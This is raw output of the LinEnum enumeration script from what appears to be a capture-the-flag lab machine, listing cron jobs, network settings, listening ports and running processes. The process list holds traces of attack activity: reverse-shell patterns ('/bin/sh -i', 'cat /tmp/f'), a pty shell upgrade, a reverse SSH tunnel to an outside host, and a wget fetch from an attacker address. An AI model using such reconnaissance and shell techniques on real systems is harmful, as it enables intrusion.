drwxr-xr-x 2 root root 4096 Sep 24 22:09 /snap/bin drwxr-xr-x 2 root root 20480 Oct 5 12:28 /usr/bin drwxr-xr-x 2 root root 4096 Apr 24 2018 /usr/games drwxr-xr-x 2 root root 4096 Aug 5 19:22 /usr/local/bin drwxr-xr-x 2 root root 4096 Aug 5 19:22 /usr/local/games drwxr-xr-x 2 root root 4096 Aug 5 19:22 /usr/local/sbin drwxr-xr-x 2 root root 4096 Oct 3 15:52 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/bash /bin/rbash /bin/dash /usr/bin/tmux /usr/bin/screen [-] Current umask value: 0002 u=rwx,g=rwx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Aug 5 19:24 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rw-r--r-- 1 root root 589 Jan 30 2019 mdadm -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 191 Aug 5 19:24 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Aug 5 19:24 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rwxr-xr-x 1 root root 376 Nov 20 2017 apport -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 539 Jan 30 2019 mdadm -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools -rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Aug 5 19:23 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Aug 5 19:23 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Aug 5 19:24 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Sat 2020-01-04 06:50:17 UTC 2h 14min left Sat 2020-01-04 00:56:23 UTC 3h 39min ago apt-daily-upgrade.timer apt-daily-upgrade.service Sat 2020-01-04 09:48:52 UTC 5h 13min left Sat 2020-01-04 00:56:23 UTC 3h 39min ago apt-daily.timer apt-daily.service Sat 2020-01-04 20:55:24 UTC 16h left Sat 2020-01-04 02:00:23 UTC 2h 35min ago motd-news.timer motd-news.service Sun 2020-01-05 01:11:28 UTC 20h left Sat 2020-01-04 01:11:28 UTC 3h 24min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2020-01-06 00:00:00 UTC 1 day 19h left Sat 2020-01-04 00:56:23 UTC 3h 39min ago fstrim.timer fstrim.service 5 timers listed. Enable thorough tests to see inactive timers ### NETWORKING ########################################## [-] Network and IP info: ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.168 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 dead:beef::250:56ff:febd:4655 prefixlen 64 scopeid 0x0<global> inet6 fe80::250:56ff:febd:4655 prefixlen 64 scopeid 0x20<link> ether 00:50:56:bd:46:55 txqueuelen 1000 (Ethernet) RX packets 10607163 bytes 1175557284 (1.1 GB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8985344 bytes 1239097587 (1.2 GB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 39887 bytes 2883797 (2.8 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 39887 bytes 2883797 (2.8 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 [-] ARP history: _gateway (10.10.10.2) at 00:50:56:bd:e2:c6 [ether] on ens160 [-] Nameserver(s): nameserver 127.0.0.53 [-] Nameserver(s): Global DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.arpa home internal intranet lan local private test Link 2 (ens160) Current Scopes: none LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no [-] Default route: default _gateway 0.0.0.0 UG 0 0 0 ens160 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 127.0.0.53:53 0.0.0.0:* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 77788 8828 ? Ss 00:56 0:04 /sbin/init maybe-ubiquity root 2 0.0 0.0 0 0 ? S 00:56 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 00:56 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 00:56 0:09 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 00:56 0:11 [rcu_sched] root 9 0.0 0.0 0 0 ? I 00:56 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 00:56 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 00:56 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 00:56 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 00:56 0:00 [cpuhp/1] root 14 0.0 0.0 0 0 ? S 00:56 0:00 [watchdog/1] root 15 0.0 0.0 0 0 ? S 00:56 0:00 [migration/1] root 16 0.0 0.0 0 0 ? S 00:56 0:09 [ksoftirqd/1] root 18 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/1:0H] root 19 0.0 0.0 0 0 ? S 00:56 0:00 [kdevtmpfs] root 20 0.0 0.0 0 0 ? I< 00:56 0:00 [netns] root 21 0.0 0.0 0 0 ? S 00:56 0:00 [rcu_tasks_kthre] root 22 0.0 0.0 0 0 ? S 00:56 0:00 [kauditd] root 24 0.0 0.0 0 0 ? S 00:56 0:00 [khungtaskd] root 25 0.0 0.0 0 0 ? S 00:56 0:00 [oom_reaper] root 26 0.0 0.0 0 0 ? I< 00:56 0:00 [writeback] root 27 0.0 0.0 0 0 ? S 00:56 0:00 [kcompactd0] root 28 0.0 0.0 0 0 ? SN 00:56 0:00 [ksmd] root 29 0.0 0.0 0 0 ? SN 00:56 0:00 [khugepaged] root 30 0.0 0.0 0 0 ? I< 00:56 0:00 [crypto] root 31 0.0 0.0 0 0 ? I< 00:56 0:00 [kintegrityd] root 32 0.0 0.0 0 0 ? I< 00:56 0:00 [kblockd] root 33 0.0 0.0 0 0 ? I< 00:56 0:00 [ata_sff] root 34 0.0 0.0 0 0 ? I< 00:56 0:00 [md] root 35 0.0 0.0 0 0 ? I< 00:56 0:00 [edac-poller] root 36 0.0 0.0 0 0 ? I< 00:56 0:00 [devfreq_wq] root 37 0.0 0.0 0 0 ? I< 00:56 0:00 [watchdogd] root 41 0.0 0.0 0 0 ? S 00:56 0:00 [kswapd0] root 42 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/u257:0] root 43 0.0 0.0 0 0 ? S 00:56 0:00 [ecryptfs-kthrea] root 85 0.0 0.0 0 0 ? I< 00:56 0:00 [kthrotld] root 86 0.0 0.0 0 0 ? I< 00:56 0:00 [acpi_thermal_pm] root 87 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_0] root 88 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_0] root 89 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_1] root 90 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_1] root 96 0.0 0.0 0 0 ? I< 00:56 0:00 [ipv6_addrconf] root 105 0.0 0.0 0 0 ? I< 00:56 0:00 [kstrp] root 122 0.0 0.0 0 0 ? I< 00:56 0:00 [charger_manager] root 160 0.0 0.0 0 0 ? I 00:56 0:07 [kworker/0:2] root 174 0.0 0.0 0 0 ? I< 00:56 0:00 [mpt_poll_0] root 175 0.0 0.0 0 0 ? I< 00:56 0:00 [mpt/0] root 214 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/0:1H] root 215 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_2] root 216 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_2] root 217 0.0 0.0 0 0 ? I< 00:56 0:00 [ttm_swap] root 218 0.0 0.0 0 0 ? S 00:56 0:00 [irq/16-vmwgfx] root 221 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/1:1H] root 288 0.0 0.0 0 0 ? I< 00:56 0:00 [raid5wq] root 334 0.0 0.0 0 0 ? S 00:56 0:00 [jbd2/sda2-8] root 335 0.0 0.0 0 0 ? I< 00:56 0:00 [ext4-rsv-conver] root 398 0.0 1.2 152852 36708 ? S<s 00:56 0:03 /lib/systemd/systemd-journald root 405 0.0 0.0 0 0 ? I< 00:56 0:00 [iscsi_eh] root 412 0.0 0.0 0 0 ? I< 00:56 0:00 [ib-comp-wq] root 413 0.0 0.0 0 0 ? I< 00:56 0:00 [ib_mcast] root 414 0.0 0.0 0 0 ? I< 00:56 0:00 [ib_nl_sa_wq] root 418 0.0 0.0 0 0 ? I< 00:56 0:00 [rdma_cm] root 419 0.0 0.1 46096 5072 ? Ss 00:56 0:01 /lib/systemd/systemd-udevd root 429 0.0 0.0 97708 1716 ? Ss 00:56 0:00 /sbin/lvmetad -f root 453 0.0 0.0 0 0 ? I 00:56 0:05 [kworker/1:2] root 466 0.0 0.0 0 0 ? S< 00:56 0:00 [loop0] root 468 0.0 0.0 0 0 ? S< 00:56 0:00 [loop1] systemd+ 530 0.0 0.1 141928 3136 ? Ssl 00:56 0:00 /lib/systemd/systemd-timesyncd root 531 0.0 0.3 88224 9488 ? Ss 00:56 0:00 /usr/bin/VGAuthService root 595 0.0 0.3 117980 11376 ? Ss 00:56 0:06 /usr/bin/vmtoolsd systemd+ 761 0.0 0.1 71848 5260 ? Ss 00:56 0:00 /lib/systemd/systemd-networkd systemd+ 815 0.0 0.1 70628 5324 ? Ss 00:56 0:00 /lib/systemd/systemd-resolved root 959 0.0 0.1 70588 5948 ? Ss 00:56 0:00 /lib/systemd/systemd-logind daemon 963 0.0 0.0 28332 2400 ? Ss 00:56 0:00 /usr/sbin/atd -f message+ 965 0.0 0.1 50388 4972 ? Ss 00:56 0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 996 0.0 0.0 110544 2092 ? Ssl 00:56 0:00 /usr/sbin/irqbalance --foreground root 1002 0.0 0.5 169096 17072 ? Ssl 00:56 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 1003 0.0 0.2 286460 6976 ? Ssl 00:56 0:00 /usr/lib/accountsservice/accounts-daemon syslog 1010 0.0 0.1 263036 5268 ? Ssl 00:56 0:00 /usr/sbin/rsyslogd -n root 1019 0.0 0.1 30028 3228 ? Ss 00:56 0:00 /usr/sbin/cron -f root 1020 0.0 0.0 678780 1832 ? Ssl 00:56 0:04 /usr/bin/lxcfs /var/lib/lxcfs/ root 1021 0.0 0.7 927332 22396 ? Ssl 00:56 0:02 /usr/lib/snapd/snapd root 1056 0.0 0.6 185944 20076 ? Ssl 00:56 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 1076 0.0 0.1 20048 3600 ? S 00:56 0:00 /bin/bash /var/SuperSecureServer/keepalive.sh root 1134 0.0 0.0 14888 1856 ? Ss 00:56 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux root 1186 0.0 0.2 291448 7268 ? Ssl 00:56 0:01 /usr/lib/policykit-1/polkitd --no-debug root 1225 0.0 0.2 72296 6484 ? Ss 00:56 0:00 /usr/sbin/sshd -D www-data 1392 0.0 0.1 20048 3600 tty1 Ss 00:56 0:00 /bin/bash /var/SuperSecureServer/init.sh www-data 1393 7.8 1.0 1216288 30508 tty1 Sl 00:56 17:07 /usr/bin/python3 /var/SuperSecureServer/main.py www-data 9091 0.0 0.1 20180 3788 pts/14 Ss 03:11 0:00 /bin/bash www-data 9587 0.0 0.3 35188 9500 pts/14 S+ 03:11 0:00 python3 www-data 20461 0.0 0.1 20180 3884 pts/15 Ss+ 03:14 0:00 /bin/bash root 23129 0.0 0.2 107984 7060 ? Ss 01:07 0:00 sshd: robert [priv] robert 24318 0.0 0.2 76640 7472 ? Ss 01:07 0:00 /lib/systemd/systemd --user robert 24330 0.0 0.0 111772 2416 ? S 01:07 0:00 (sd-pam) robert 24722 0.0 0.1 107984 3536 ? S 01:07 0:00 sshd: robert@pts/0 robert 24737 0.0 0.1 21460 5224 pts/0 Ss+ 01:07 0:00 -bash root 48269 0.0 0.0 0 0 ? I 04:11 0:00 [kworker/u256:2] root 48610 0.0 0.2 107984 7184 ? Ss 04:11 0:00 sshd: robert [priv] robert 49091 0.0 0.1 107984 3504 ? S 04:11 0:00 sshd: robert@pts/19 robert 49110 0.0 0.1 21592 5320 pts/19 Ss 04:11 0:00 -bash root 50224 0.0 0.0 0 0 ? I 03:44 0:00 [kworker/u256:1] www-data 59111 0.0 0.1 20180 3948 pts/16 Ss+ 03:26 0:00 /bin/bash www-data 60607 0.0 0.0 4628 800 tty1 S 03:26 0:00 /bin/sh -i www-data 62613 0.0 0.0 4628 1632 tty1 S 04:13 0:00 /bin/sh -i root 64456 0.0 0.0 0 0 ? I 04:13 0:00 [kworker/0:1] www-data 66068 0.0 0.0 6180 740 tty1 S 04:14 0:00 cat /tmp/f www-data 67117 0.0 0.0 4628 1688 tty1 S 04:14 0:00 /bin/sh -i root 67120 0.0 0.1 62224 4140 pts/19 S+ 04:14 0:00 sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py root 67121 0.0 0.4 41052 13296 pts/19 S+ 04:14 0:00 /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py root 69540 0.0 0.0 0 0 ? I 04:16 0:00 [kworker/1:0] root 70607 0.0 0.0 0 0 ? I 03:56 0:00 [kworker/u256:0] root 70976 0.0 0.2 107984 7180 ? Ss 02:53 0:00 sshd: robert [priv] robert 71970 0.0 0.1 107984 3544 ? S 02:54 0:00 sshd: robert@pts/11 robert 72057 0.0 0.1 21460 5296 pts/11 Ss+ 02:54 0:00 -bash www-data 74786 0.0 0.0 4628 1648 tty1 S 01:45 0:00 /bin/sh -i www-data 74844 0.0 0.1 20180 3924 pts/2 Ss 01:48 0:00 /bin/bash www-data 74896 0.0 0.1 46836 5748 tty1 S 01:50 0:00 ssh robert@127.0.0.1 www-data 75119 0.0 0.0 4628 800 tty1 S 01:55 0:00 sh -c ping 10.10.15.130 www-data 75120 0.0 0.0 15100 1104 tty1 S 01:55 0:00 ping 10.10.15.130 root 75579 0.0 0.1 62224 4200 pts/19 S+ 04:20 0:00 sudo -u robert ssh -R 1337:localhost:22 root@10.10.15.50 robert 75580 0.0 0.1 46836 5792 pts/19 S+ 04:20 0:00 ssh -R 1337:localhost:22 root@10.10.15.50 www-data 76118 0.0 0.0 4628 1656 tty1 S 01:59 0:00 /bin/sh -i www-data 77487 0.0 0.0 4628 1648 pts/2 S+ 02:03 0:00 /bin/sh -i www-data 79380 0.0 0.1 20180 3768 pts/3 Ss+ 02:07 0:00 /bin/bash www-data 79564 0.0 0.3 38956 9684 tty1 S 04:25 0:00 python3 /tmp/putt.py www-data 79565 0.0 0.0 4628 772 pts/17 Ss+ 04:25 0:00 /bin/sh www-data 80153 0.0 0.3 38956 9400 tty1 S 02:08 0:00 python3 -c import pty; pty.spawn("/bin/sh") www-data 80155 0.0 0.0 4628 876 pts/4 Ss+ 02:08 0:00 /bin/sh root 80509 0.0 0.2 105868 7212 ? Ss 04:30 0:00 sshd: robert [priv] robert 80668 0.0 0.1 108168 5560 ? S 04:30 0:00 sshd: robert@pts/18 robert 80671 0.0 0.1 21460 5336 pts/18 Ss+ 04:30 0:00 -bash root 81627 0.0 0.2 105684 7088 ? Ss 04:31 0:00 sshd: robert [priv] robert 81722 0.1 0.1 107984 5616 ? S 04:31 0:00 sshd: robert@pts/20 robert 81726 0.2 0.2 22252 5992 pts/20 Ss+ 04:31 0:00 -bash root 82474 0.0 0.2 105684 6992 ? Ss 04:32 0:00 sshd: robert [priv] robert 87211 0.0 0.1 107984 5716 ? S 04:32 0:00 sshd: robert@pts/21 robert 87215 0.0 0.1 21460 5284 pts/21 Ss+ 04:32 0:00 -bash root 87254 0.0 0.2 105684 6964 ? Ss 04:32 0:00 sshd: robert [priv] robert 87353 0.0 0.1 107984 5420 ? S 04:32 0:00 sshd: robert@pts/22 robert 87362 0.0 0.1 21460 5320 pts/22 Ss 04:32 0:00 -bash root 88024 0.0 0.1 62224 4036 tty1 S 04:33 0:00 sudo python3 BetteSSH/BetterSSH.py www-data 88325 0.0 0.1 20180 3776 pts/5 Ss 02:17 0:00 /bin/bash www-data 88445 0.0 0.0 4628 832 tty1 S+ 04:34 0:00 /bin/sh -i www-data 88473 0.0 0.0 6316 736 pts/5 S+ 02:17 0:00 cat www-data 88905 0.0 0.1 20180 3904 pts/6 Ss+ 02:18 0:00 /bin/bash root 88936 0.0 0.0 0 0 ? I 04:34 0:00 [kworker/u256:3] root 89081 0.0 0.0 6176 792 ? S 04:35 0:00 sleep 30 robert 89343 0.0 0.1 12512 3988 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89344 0.0 0.1 12512 3052 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89345 0.0 0.0 6180 812 pts/22 S+ 04:35 0:00 tee -a robert 89573 0.0 0.0 12512 2796 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89574 0.0 0.1 38372 3584 pts/22 R+ 04:35 0:00 ps aux www-data 91233 0.0 0.1 20180 3908 pts/12 Ss+ 02:54 0:00 /bin/bash www-data 99430 0.0 0.1 20180 3896 pts/7 Ss+ 02:31 0:00 /bin/bash root 101320 0.0 0.2 107984 7192 ? Ss 02:33 0:00 sshd: robert [priv] robert 101468 0.0 0.1 108120 4488 ? S 02:33 0:00 sshd: robert@pts/8 robert 101476 0.0 0.1 21460 5380 pts/8 Ss+ 02:33 0:00 -bash root 105982 0.0 0.1 62224 3972 tty1 S 03:36 0:00 sudo wget 10.10.14.41:4400/crackme.py www-data 109980 0.0 0.0 4628 1632 tty1 S 03:37 0:00 /bin/sh -i www-data 110200 0.0 0.1 20180 3608 pts/9 Ss 02:41 0:00 /bin/bash www-data 110339 0.0 0.3 35188 9416 pts/9 S+ 02:41 0:00 python3 www-data 110434 0.0 0.1 20180 3800 pts/10 Ss 02:41 0:00 /bin/bash www-data 110962 0.0 0.8 95836 24276 pts/10 S+ 02:41 0:00 python3 www-data 127337 0.0 0.1 20180 3588 pts/13 Ss 03:06 0:00 /bin/bash www-data 127473 0.0 0.3 35188 9368 pts/13 S+ 03:07 0:00 python3 [-] Process binaries and associated permissions (from above list): 1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 2019 /bin/bash 0 lrwxrwxrwx 1 root root 4 Aug 5 19:23 /bin/sh -> dash 1.6M -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 /lib/systemd/systemd 128K -rwxr-xr-x 1 root root 127K Sep 5 03:59 /lib/systemd/systemd-journald 216K -rwxr-xr-x 1 root root 215K Sep 5 03:59 /lib/systemd/systemd-logind 1.6M -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 /lib/systemd/systemd-networkd 372K -rwxr-xr-x 1 root root 371K Sep 5 03:59 /lib/systemd/systemd-resolved 40K -rwxr-xr-x 1 root root 39K Sep 5 03:59 /lib/systemd/systemd-timesyncd 572K -rwxr-xr-x 1 root root 571K Sep 5 03:59 /lib/systemd/systemd-udevd 56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty 0 lrwxrwxrwx 1 root root 20 Sep 5 03:59 /sbin/init -> /lib/systemd/systemd 84K -rwxr-xr-x 1 root root 83K Jun 4 2019 /sbin/lvmetad 232K -rwxr-xr-x 1 root root 232K Jun 10 2019 /usr/bin/dbus-daemon 20K -rwxr-xr-x 1 root root 19K Nov 23 2018 /usr/bin/lxcfs 0 lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6 124K -rwxr-xr-x 1 root root 123K May 14 2019 /usr/bin/VGAuthService 52K -rwxr-xr-x 1 root root 51K May 14 2019 /usr/bin/vmtoolsd 180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon 16K -rwxr-xr-x 1 root root 15K Mar 27 2019 /usr/lib/policykit-1/polkitd 16M -rwxr-xr-x 1 root root 17M Jun 5 2019 /usr/lib/snapd/snapd 28K -rwxr-xr-x 1 root root 27K Feb 20 2018 /usr/sbin/atd 48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron 64K -rwxr-xr-x 1 root root 63K Jan 9 2019 /usr/sbin/irqbalance 668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd 772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 176 drwxr-xr-x 2 root root 4096 Nov 25 11:05 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rwxr-xr-x 1 root root 2269 Apr 22 2017 acpid -rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor -rwxr-xr-x 1 root root 2802 Nov 20 2017 apport -rwxr-xr-x 1 root root 1071 Aug 21 2015 atd -rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh -rwxr-xr-x 1 root root 3049 Nov 16 2017 cron -rwxr-xr-x 1 root root 937 Mar 18 2018 cryptdisks -rwxr-xr-x 1 root root 978 Mar 18 2018 cryptdisks-early -rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus -rwxr-xr-x 1 root root 4489 Jun 28 2018 ebtables -rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common -rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh -rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance -rwxr-xr-x 1 root root 1503 Dec 12 2018 iscsid -rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod -rwxr-xr-x 1 root root 695 Dec 3 2017 lvm2 -rwxr-xr-x 1 root root 571 Dec 3 2017 lvm2-lvmetad -rwxr-xr-x 1 root root 586 Dec 3 2017 lvm2-lvmpolld -rwxr-xr-x 1 root root 2378 Nov 23 2018 lxcfs -rwxr-xr-x 1 root root 2240 Nov 23 2018 lxd -rwxr-xr-x 1 root root 2653 Jan 30 2019 mdadm -rwxr-xr-x 1 root root 1249 Jan 30 2019 mdadm-waitidle -rwxr-xr-x 1 root root 4597 Nov 25 2016 networking -rwxr-xr-x 1 root root 2503 Dec 12 2018 open-iscsi -rwxr-xr-x 1 root root 1846 Apr 5 2019 open-vm-tools -rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth -rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log -rwxr-xr-x 1 root root 1191 Jan 17 2018 procps -rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync -rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog -rwxr-xr-x 1 root root 1222 May 21 2017 screen-cleanup -rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh -rwxr-xr-x 1 root root 5974 Apr 20 2018 udev -rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw -rwxr-xr-x 1 root root 1391 Apr 29 2019 unattended-upgrades -rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd [-] /lib/systemd/* config file permissions: /lib/systemd/: total 7.3M drwxr-xr-x 22 root root 40K Nov 25 11:05 system drwxr-xr-x 2 root root 4.0K Sep 24 22:08 system-generators drwxr-xr-x 2 root root 4.0K Sep 24 22:08 system-preset drwxr-xr-x 2 root root 4.0K Sep 24 22:08 network -rw-r--r-- 1 root root 2.3M Sep 5 03:59 libsystemd-shared-237.so -rw-r--r-- 1 root root 699 Sep 5 03:59 resolv.conf -rwxr-xr-x 1 root root 1.3K Sep 5 03:59 set-cpufreq -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 systemd -rwxr-xr-x 1 root root 6.0K Sep 5 03:59 systemd-ac-power -rwxr-xr-x 1 root root 18K Sep 5 03:59 systemd-backlight -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-binfmt -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-cgroups-agent -rwxr-xr-x 1 root root 22K Sep 5 03:59 systemd-cryptsetup -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-dissect -rwxr-xr-x 1 root root 18K Sep 5 03:59 systemd-fsck -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-fsckd -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-growfs -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-hibernate-resume -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-hostnamed -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-initctl -rwxr-xr-x 1 root root 127K Sep 5 03:59 systemd-journald -rwxr-xr-x 1 root root 35K Sep 5 03:59 systemd-localed -rwxr-xr-x 1 root root 215K Sep 5 03:59 systemd-logind -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-makefs -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-modules-load -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 systemd-networkd -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-networkd-wait-online -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-quotacheck -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-random-seed -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-remount-fs -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-reply-password -rwxr-xr-x 1 root root 371K Sep 5 03:59 systemd-resolved -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-rfkill -rwxr-xr-x 1 root root 43K Sep 5 03:59 systemd-shutdown -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-sleep -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-socket-proxyd -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-sulogin-shell -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-sysctl -rwxr-xr-x 1 root root 27K Sep 5 03:59 systemd-timedated -rwxr-xr-x 1 root root 39K Sep 5 03:59 systemd-timesyncd -rwxr-xr-x 1 root root 571K Sep 5 03:59 systemd-udevd -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-update-utmp -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-user-sessions -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-veritysetup -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-volatile-root drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-sleep drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-shutdown -rwxr-xr-x 1 root root 1.3K Jul 22 16:45 systemd-sysv-install /lib/systemd/system: total 1020K 